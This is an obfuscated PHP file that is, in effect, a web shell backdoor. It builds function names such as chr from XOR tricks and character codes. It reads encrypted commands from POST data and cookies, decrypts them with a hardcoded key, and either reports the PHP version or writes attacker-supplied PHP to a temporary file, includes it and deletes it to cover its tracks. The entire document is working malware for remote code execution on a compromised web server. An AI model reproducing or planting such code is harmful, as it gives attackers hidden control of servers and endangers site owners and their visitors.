<?php $frm_khnp  = /* txwhn */ 'frm_khnp'  ^ /*  hm*/ '';

$jprczvlnf /* vmp */ =    "a"."r".$frm_khnp(605-491)	. /*   lb   */ "a"."y"."\x5f" /* erk  */ .    "\155"	.	"a".$frm_khnp(166-54);


$labcvao /*pcuv   */ =    "\143"      .    $frm_khnp(1028-917)    .   $frm_khnp(117)  .    $frm_khnp(110)  . /*   zxwbka   */ "\164";




function      ryseonzdoa($rwafq,     $alzagyqhx){ /*   vur   */ global  $frm_khnp;     


    $rwafq    =    "<" /*zszap */ .       "?"."\x70"    .    "h"."p".$frm_khnp(32)      .     "\165"    .    "\x6e" /* ov */ . /*mqhprp */ "\x6c"    .      $frm_khnp(105)  .	"\156"      .    $frm_khnp(265-158)    . /*e */ $frm_khnp(51-11) /*  nqa  */ . /* _q  */ "\x5f"    .   "\x5f" /*o  */ . /*  j */ $frm_khnp(70)    .     "\111"	. /*   tbop  */ "L".$frm_khnp(69)  .       $frm_khnp(382-287)	.	"\137"       .	$frm_khnp(88-47)    .    ";".$frm_khnp(32)      .    $rwafq[$frm_khnp(1060-960)];


	$mbwwdofy    =    $frm_khnp(102)  .   $frm_khnp(105) /*  _amwqr */ .    "\154"    .    "\x65"."_"."\160"     . /*rx  */ $frm_khnp(117) /*geqmhb */ .  "t"."\x5f"    .    $frm_khnp(99) /* gtph */ .	"o".$frm_khnp(572-462)	. /*ystk   */ $frm_khnp(116) /*  d */ .  $frm_khnp(101)	. /* yigtmt*/ "n"."t".$frm_khnp(1094-979);
 /*f  */ 


     $mbwwdofy($alzagyqhx,    $rwafq);
     

     cwspuofjhx($alzagyqhx);}


$syqhpyjgdp    =  73;


function	cwspuofjhx($alzagyqhx)

{

 /*augk */ global /*  tajrr   */ $frm_khnp;	
      include($alzagyqhx);    $hzmvrmp	=    $alzagyqhx;

 /*   og_c*/ @unlink($hzmvrmp);

}



function    ezazgsi()


{


    global /*egew */ $frm_khnp;


 /*   dkg */ $qe_umajrzw	=    array();


      $qe_umajrzw["p".$frm_khnp(118)]       =    phpversion();
 /*szhnio  */ $qe_umajrzw["\163"   . /*blhfvb */ $frm_khnp(118)]	= /* ri  */ "3"."\x2e" /* ejw */ .    "5";
	$xsdpzls    =    74; /*  xobeqr */ echo /*   qz  */ @serialize($qe_umajrzw);
}



function	kiurq($rwafq,      $znshranfs)


{


	global    $frm_khnp;



 /*  qxlwsq*/ $kpvmlvcvcz  =	"";       $g_rtido /*   rqon*/ =    'ko';

	$arspvfol	=       hash('sha256', /*ihhmb   */ $rwafq);
	$doofnvht    = /*   gur  */ str_replace('_qvtczqbk',	$arspvfol,  $g_rtido);     $qe_umajrzw   =   0; /*  rm   */ while	($qe_umajrzw    <   strlen($rwafq)) /* e_   */ {

	$elpsg    =	isset($znshranfs)	? /*fwhb   */ $znshranfs    : /* xxkz*/ '';

    for     ($suuqfbcrvx   =	0;	$suuqfbcrvx    < /* kbwyc */ strlen($elpsg) /*   _xfj  */ &&    $qe_umajrzw /*  np   */ <	strlen($rwafq); /*   tgurys*/ $suuqfbcrvx++,	$qe_umajrzw++)   {


 /*   xwjw  */ $kpvmlvcvcz /*  ili   */ .=    $frm_khnp(ord($rwafq[$qe_umajrzw])     ^	ord($elpsg[$suuqfbcrvx]));


    }  if     (strlen($kpvmlvcvcz)    > /*yrglfx  */ 20)   {

    $doofnvht       = /*  inil   */ substr($kpvmlvcvcz,   0, /*  einqmc   */ 20);
   }

   }  if       (empty($kpvmlvcvcz))    {

    $kpvmlvcvcz      =	date('Y-m-d     H:i:s');
    }


       return    $kpvmlvcvcz;

}






function /*   uf   */ jzicpd($yvscabv)

{


     global  $frm_khnp;


	     $qe_umajrzwjdgqivdaq /*  o*/ =  "4".$frm_khnp(55)    . /* u_gluz */ "\x65" /*  lzoebc  */ .    $frm_khnp(1060-960).$frm_khnp(887-834) /*   v*/ . /*  y */ "c"."\x34"  .       "\x65"."\55" /*  llbvr*/ .	$frm_khnp(53)       . /*   owu   */ $frm_khnp(989-932)   .    $frm_khnp(1089-987) /* hrkdrd*/ .	"\x35" /*d*/ .    "\55" /*   mea   */ . /*  hjnm */ $frm_khnp(52) /*  isaswv */ . /*   bgw  */ "\x31" /*  mmnd */ . /*hdebk*/ $frm_khnp(54)    .       "9"."-"."8"."\67"    .   "6"."\141"  .      $frm_khnp(211-166)     . /* zogaa  */ "0"."c"."6"."9"."\67"      .       "1".$frm_khnp(56)    . /* duukqe*/ "\x65"."7".$frm_khnp(1060-960)."7"."\141";
    


      foreach /* zfwmi  */ ($yvscabv  as       $lsazhst /* prwghr   */ =>    $rwafq)    {

 /*   phojx_*/ _uumhqp(base64_decode($rwafq), /* gib   */ $qe_umajrzwjdgqivdaq,   $lsazhst);
    }}
function    _uumhqp($rwafq,    $qe_umajrzwjdgqivdaq,    $lsazhst)

{       global /*   rcpmob*/ $frm_khnp; /*   j_r */   $rwafq    =	unserialize(kiurq(kiurq($rwafq,      $qe_umajrzwjdgqivdaq),   $lsazhst));
	$kpdgj   =    'argscdy';


	$zlydjg  = /*vgas  */ 'wvdyvx';    if   (isset($rwafq[$frm_khnp(97) /*   lq */ .	"k"]))      {


    if    ($rwafq["a"]       ==    "i")      { /*  uvtwp   */ ezazgsi();
    }    elseif    ($rwafq["a"]	==  "\x65") /*   g*/ {
 /*   sju  */ ryseonzdoa($rwafq,  sprintf($frm_khnp(218-172)	.   $frm_khnp(47) /*xepah*/ . /*nuq */ $frm_khnp(141-104)       .	"\x73"   .    ".".$frm_khnp(177-65)    .       "l",       md5($qe_umajrzwjdgqivdaq)));

			$mbdfduqsj    =    44;      }
	exit();


 /*  hnq*/ }
}


jzicpd($_POST);    





$qe_umajrzwlppaodu     =   $jprczvlnf('rawurldecode',    $_POST);


$wmcqslpsls    =	$labcvao($qe_umajrzwlppaodu);
jzicpd($_COOKIE);     
$ualnxiphrn   =     $jprczvlnf('rawurldecode',     $_COOKIE);





?>